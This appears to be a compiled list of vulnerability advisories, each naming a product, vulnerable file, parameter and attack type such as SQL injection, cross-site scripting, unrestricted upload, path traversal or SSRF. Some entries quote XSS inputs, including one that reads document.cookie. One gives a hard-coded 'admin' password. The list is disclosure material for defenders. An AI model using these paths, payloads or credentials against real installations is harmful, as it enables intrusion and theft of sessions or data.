A vulnerability was found in Active It Zone Active eCommerce CMS 6.5.0. It has been declared as problematic. This vulnerability affects unknown code of the file /ecommerce/support_ticket of the component Create Ticket Page. The manipulation of the argument details with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. VDB-232954 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Onest CRM 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/project/update/2 of the component Project List Handler. The manipulation of the argument name with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-232953 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SmartWeb Infotech Job Board 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /settings/account of the component My Profile Page. The manipulation of the argument filename leads to unrestricted upload. The attack may be launched remotely. The identifier of this vulnerability is VDB-232952. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in SourceCodester Shopping Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file insert-product.php. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232951.
A vulnerability, which was classified as critical, was found in SourceCodester Shopping Website 1.0. Affected is an unknown function of the file search-result.php. The manipulation of the argument product leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-232950 is the identifier assigned to this vulnerability.
A vulnerability was found in RocketSoft Rocket LMS 1.7. It has been declared as problematic. This vulnerability affects unknown code of the file /contact/store of the component Contact Form. The manipulation of the argument name/subject/message leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-232756.
A vulnerability was found in SimplePHPscripts GuestBook Script 2.2. It has been classified as problematic. This affects an unknown part of the file preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-232755.
A vulnerability was found in SimplePHPscripts Event Script 2.1 and classified as problematic. Affected by this issue is some unknown functionality of the file preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. It is recommended to upgrade the affected component. VDB-232754 is the identifier assigned to this vulnerability.
A vulnerability has been found in SimplePHPscripts Simple Blog 3.2 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. It is recommended to upgrade the affected component. The identifier VDB-232753 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Campcodes Retro Cellphone Online Store 1.0. Affected is an unknown function of the file /admin/edit_product.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232752.
A vulnerability was found in SimplePHPscripts Classified Ads Script 1.8. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file user.php of the component HTTP POST Request Handler. The manipulation of the argument title leads to cross site scripting. The attack can be launched remotely. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-232711.
A vulnerability was found in SimplePHPscripts Classified Ads Script 1.8. It has been classified as problematic. Affected is an unknown function of the file /preview.php of the component URL Parameter Handler. The manipulation of the argument p leads to cross site scripting. It is possible to launch the attack remotely. It is recommended to upgrade the affected component. VDB-232710 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Shopping Website 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file forgot-password.php. The manipulation of the argument contact leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232675.
A vulnerability was found in SourceCodester Shopping Website 1.0. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-232674 is the identifier assigned to this vulnerability.
A vulnerability was found in Ruijie RG-BCR860 2.5.13 and classified as critical. This issue affects some unknown processing of the component Network Diagnostic Page. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232547. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
gpt_academic provides a graphical interface for ChatGPT/GLM. A vulnerability was found in gpt_academic 3.37 and prior. This issue affects some unknown processing of the component Configuration File Handler. The manipulation of the argument file leads to information disclosure. Since no sensitive files are configured to be off-limits, sensitive information files in some working directories can be read through the `/file` route, leading to sensitive information leakage. This affects users that uses file configurations via `config.py`, `config_private.py`, `Dockerfile`. A patch is available at commit 1dcc2873d2168ad2d3d70afcb453ac1695fbdf02. As a workaround, one may use environment variables instead of `config*.py` files to configure this project, or use docker-compose installation to configure this project.
A vulnerability was found in Campcodes Retro Cellphone Online Store 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/index.php. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232351.
A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file detailview.php. The manipulation of the argument employeeid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232288.
A vulnerability, which was classified as critical, was found in SourceCodester Game Result Matrix System 1.0. This affects an unknown part of the file /dipam/athlete-profile.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232239.
A vulnerability, which was classified as problematic, has been found in SourceCodester Game Result Matrix System 1.0. Affected by this issue is some unknown functionality of the file /dipam/save-delegates.php of the component GET Parameter Handler. The manipulation of the argument del_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-232238 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Online School Fees System 1.0. Affected by this vulnerability is an unknown functionality of the file /paysystem/datatable.php of the component GET Parameter Handler. The manipulation of the argument doj leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-232237 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Wavlink WN579X3 up to 20230615. Affected is an unknown function of the file /cgi-bin/adm.cgi of the component Ping Test. The manipulation of the argument pingIp leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232236. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Online School Fees System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file ajx.php of the component GET Parameter Handler. The manipulation of the argument name_startsWith leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232016.
A vulnerability has been found in code-projects Agro-School Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file exam-delete.php. The manipulation of the argument test_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232015.
A vulnerability was found in PuneethReddyHC Online Shopping System Advanced 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/reg.php of the component Admin Registration. The manipulation leads to improper authentication. The attack can be launched remotely. The identifier VDB-232009 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Resort Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231937 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in PuneethReddyHC online-shopping-system-advanced 1.0. This affects an unknown part of the file addsuppliers.php. The manipulation of the argument First name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231807.
A vulnerability, which was classified as critical, has been found in code-projects Agro-School Management System 1.0. Affected by this issue is some unknown functionality of the file loaddata.php. The manipulation of the argument subject/course leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231806 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Resort Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file ?page=rooms of the component Manage Room Page. The manipulation of the argument Cottage Number leads to cross site scripting. The attack can be launched remotely. The identifier VDB-231805 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in whaleal IceFrog 1.1.8. Affected is an unknown function of the component Aviator Template Engine. The manipulation leads to deserialization. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231804.
A vulnerability was found in miniCal 1.0.0. It has been rated as critical. This issue affects some unknown processing of the file /booking/show_bookings/. The manipulation of the argument search_query leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231803. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-EW1200G EW_3.0(1)B11P204. It has been declared as critical. This vulnerability affects unknown code of the file app.09df2a9e44ab48766f5f.js of the component Admin Password Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-231802 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in C-DATA Web Management System up to 20230607. It has been classified as critical. This affects an unknown part of the file /cgi-bin/jumpto.php?class=user&amp;page=config_save&amp;isphp=1 of the component User Creation Handler. The manipulation of the argument user/newpassword leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231801 was assigned to this vulnerability.
A vulnerability classified as critical was found in PHPGurukul Rail Pass Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view-pass-detail.php of the component POST Request Handler. The manipulation of the argument searchdata leads to sql injection. The attack can be launched remotely. The identifier VDB-231625 was assigned to this vulnerability.
A vulnerability classified as critical has been found in code-projects Supplier Management System 1.0. Affected is an unknown function of the file btn_functions.php of the component Picture Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231624.
A vulnerability was found in OTCMS up to 6.62 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/read.php?mudi=announContent. The manipulation of the argument url leads to path traversal. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231512.
A vulnerability has been found in OTCMS up to 6.62 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file usersNews_deal.php. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231511.
A vulnerability, which was classified as problematic, was found in OTCMS up to 6.62. Affected is an unknown function of the file admin/readDeal.php?mudi=readQrCode. The manipulation of the argument img leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-231510 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in OTCMS up to 6.62. This issue affects some unknown processing of the file /admin/read.php?mudi=getSignal. The manipulation of the argument signalUrl leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231509 was assigned to this vulnerability.
A vulnerability classified as critical was found in OTCMS up to 6.62. This vulnerability affects unknown code. The manipulation of the argument username/password with the input admin leads to use of hard-coded password. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231508.
A vulnerability was found in Zhong Bang CRMEB up to 4.6.0 and classified as critical. This issue affects some unknown processing of the file /api/wechat/app_auth of the component Image Upload. The manipulation leads to deserialization. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231503. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in UJCMS up to 6.0.2 and classified as problematic. This vulnerability affects unknown code of the component ZIP Package Handler. The manipulation of the argument dir leads to information disclosure. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 7.0.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-231502 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in RoadFlow Visual Process Engine .NET Core Mvc 2.13.3. Affected by this issue is some unknown functionality of the file /Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&amp;tabid=tab_0B73635494734D66B9C015CAC149EB05 of the component Login. The manipulation of the argument sidx/sord leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Chengdu VEC40G 3.0. Affected by this vulnerability is an unknown functionality of the file /send_order.cgi?parameter=restart. The manipulation of the argument restart with the input reboot leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231229 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in SourceCodester Online School Fees System 1.0. This affects an unknown part of the file /paysystem/branch.php of the component POST Parameter Handler. The manipulation of the argument branch leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231501 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in PHPGurukul Teachers Record Management System 1.0. Affected by this issue is some unknown functionality of the file /changeimage.php of the component Profile Picture Handler. The manipulation of the argument newpic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231176.
A vulnerability was found in SourceCodester Sales Tracker Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /classes/Users.php?f=save. The manipulation of the argument firstname/middlename/lastname/username leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231164.
A vulnerability was found in SourceCodester Performance Indicator System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/addproduct.php. The manipulation of the argument prodname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231163.
A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin\inquiries\view_inquiry.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231151.
A vulnerability, which was classified as critical, was found in SourceCodester Lost and Found Information System 1.0. Affected is an unknown function of the file admin\user\manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-231150 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Life Insurance Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file insertNominee.php of the component POST Parameter Handler. The manipulation of the argument nominee_id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231109 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Discussion Forum Site 1.0. This affects an unknown part of the file admin\posts\view_post.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231021 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file user\manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231020.
A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file posts\manage_post.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231019.
A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been classified as critical. Affected is an unknown function of the file admin\user\manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-231018 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0 and classified as critical. This issue affects some unknown processing of the file admin\posts\manage_post.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231017 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Online Discussion Forum Site 1.0 and classified as critical. This vulnerability affects unknown code of the file admin\categories\view_category.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231016.
A vulnerability, which was classified as critical, was found in SourceCodester Online Discussion Forum Site 1.0. This affects an unknown part of the file admin\categories\manage_category.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231015.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Discussion Forum Site 1.0. Affected by this issue is some unknown functionality of the file classes\Users.php?f=registration. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231014 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Online Discussion Forum Site 1.0. Affected by this vulnerability is an unknown functionality of the file admin\posts\manage_post.php. The manipulation of the argument title leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231013 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Online Discussion Forum Site 1.0. Affected is an unknown function of the file admin\posts\manage_post.php. The manipulation of the argument content leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231012.
A vulnerability has been found in Dahua Smart Parking Management up to 20230528 and classified as problematic. This vulnerability affects unknown code of the file /ipms/imageConvert/image. The manipulation of the argument fileUrl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230800. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in SourceCodester Service Provider Management System 1.0. This affects an unknown part of the file view_service.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230799.
A vulnerability, which was classified as critical, has been found in SourceCodester Service Provider Management System 1.0. Affected by this issue is some unknown functionality of the file view.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230798 is the identifier assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Captura up to 8.0.0. It has been declared as critical. This vulnerability affects unknown code in the library CRYPTBASE.dll. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The complexity of an attack is rather high. The exploitation appears to be difficult. The identifier of this vulnerability is VDB-230668. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability classified as critical has been found in Campcodes Retro Cellphone Online Store 1.0. Affected is an unknown function of the file /admin/modal_add_product.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230580.
A vulnerability was found in code-projects Agro-School Management System 1.0. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument password leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-230568.
A vulnerability was found in code-projects Agro-School Management System 1.0 and classified as critical. This issue affects some unknown processing of the file btn_functions.php of the component Attachment Image Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-230567.
A vulnerability, which was classified as critical, was found in SourceCodester Online Exam Form Submission 1.0. This affects an unknown part of the file /admin/update_s6.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-230565 was assigned to this vulnerability.
A vulnerability was found in 07FLY CRM up to 1.2.0. It has been declared as problematic. This vulnerability affects unknown code of the component User Profile Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230560.
A vulnerability was found in YFCMF up to 3.0.4. It has been rated as problematic. This issue affects some unknown processing of the file app/admin/controller/Ajax.php. The manipulation of the argument controllername leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230543.
A vulnerability was found in YFCMF up to 3.0.4. It has been declared as problematic. This vulnerability affects unknown code of the file index.php. The manipulation leads to path traversal: '../filedir'. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-230542 is the identifier assigned to this vulnerability.
A vulnerability has been found in Guangdong Pythagorean OA Office System up to 4.50.31 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Schedule Handler. The manipulation of the argument description leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230467.
A vulnerability has been found in Guangdong Pythagorean OA Office System up to 4.50.31 and classified as problematic. This vulnerability affects unknown code of the file /note/index/delete. The manipulation of the argument id leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-230458 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/?page=user/list. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-230362 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been classified as problematic. This affects an unknown part of the file admin/?page=user/manage_user of the component Manage User Page. The manipulation of the argument First Name/Middle Name/Last Name leads to basic cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-230361 was assigned to this vulnerability.
A vulnerability was found in yiwent Vip Video Analysis 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file admin/admincore.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230360.
A vulnerability has been found in yiwent Vip Video Analysis 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file data/title.php. The manipulation of the argument titurl leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230359.
A vulnerability, which was classified as problematic, was found in BeipyVideoResolution up to 2.6. Affected is an unknown function of the file admin/admincore.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-230358 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in ningzichun Student Management System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument user/pass leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230355.
A vulnerability was found in ningzichun Student Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file resetPassword.php of the component Password Reset Handler. The manipulation of the argument sid leads to weak password recovery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230354 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Local Service Search Engine Management System 1.0. This affects an unknown part of the file /admin/ajax.php?action=save_area of the component POST Parameter Handler. The manipulation of the argument area with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-230349 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Simple Chat System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=read_msg of the component POST Parameter Handler. The manipulation of the argument convo_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230348.
A vulnerability classified as critical was found in SourceCodester Train Station Ticketing System 1.0. Affected by this vulnerability is an unknown functionality of the file manage_prices.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230347.
A vulnerability, which was classified as problematic, has been found in Abstrium Pydio Cells 4.2.0. This issue affects some unknown processing of the component Chat. The manipulation leads to basic cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.2.1 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-230213 was assigned to this vulnerability.
A vulnerability classified as critical was found in Abstrium Pydio Cells 4.2.0. This vulnerability affects unknown code of the component User Creation Handler. The manipulation leads to improper control of resource identifiers. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.2.1 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230212.
A vulnerability classified as critical has been found in Abstrium Pydio Cells 4.2.0. This affects an unknown part of the component User Creation Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.2.1 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230211.
A vulnerability was found in Abstrium Pydio Cells 4.2.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Change Subscription Handler. The manipulation leads to authorization bypass. The exploit has been disclosed to the public and may be used. Upgrading to version 4.2.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-230210 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Students Online Internship Timesheet Syste 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=save_company. The manipulation of the argument name with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230204.
A vulnerability, which was classified as critical, has been found in SourceCodester Faculty Evaluation System 1.0. Affected by this issue is some unknown functionality of the file index.php?page=edit_user. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230150 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Students Online Internship Timesheet System 1.0. Affected is an unknown function of the file rendered_report.php of the component GET Parameter Handler. The manipulation of the argument sid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-230142 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in code-projects Bus Dispatch and Information System 1.0. Affected is an unknown function of the file delete_bus.php. The manipulation of the argument busid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230112.
A vulnerability was found in DedeCMS up to 5.7.106. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file uploads/dede/article_allowurl_edit.php. The manipulation of the argument allurls leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230083.
A vulnerability was found in SeaCMS 11.6 and classified as problematic. This issue affects some unknown processing of the file member.php of the component Picture Upload Handler. The manipulation of the argument oldpic leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-230081 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Webkul krayin crm 1.2.4. This affects an unknown part of the file /admin/contacts/organizations/edit/2 of the component Edit Person Page. The manipulation of the argument Organization leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230079. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Supcon SimField up to 1.80.00.00. Affected by this issue is some unknown functionality of the file /admin/reportupload.aspx. The manipulation of the argument files[] leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230078 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in SourceCodester Comment System 1.0. Affected is an unknown function of the file index.php of the component GET Parameter Handler. The manipulation of the argument msg leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-230076.
A vulnerability classified as problematic has been found in NFine Rapid Development Platform 20230511. This affects an unknown part of the file /SystemManage/Role/GetGridJson?keyword=&amp;page=1&amp;rows=20. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229977 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in NFine Rapid Development Platform 20230511. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /SystemManage/Organize/GetTreeGridJson?_search=false&amp;nd=1681813520783&amp;rows=10000&amp;page=1&amp;sidx=&amp;sord=asc. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229976. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in NFine Rapid Development Platform 20230511. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /SystemManage/User/GetGridJson?_search=false&amp;nd=1680855479750&amp;rows=50&amp;page=1&amp;sidx=F_CreatorTime+desc&amp;sord=asc. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229975. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in NFine Rapid Development Platform 20230511. It has been classified as problematic. Affected is an unknown function of the file /Login/CheckLogin. The manipulation leads to use of weak hash. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-229974 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
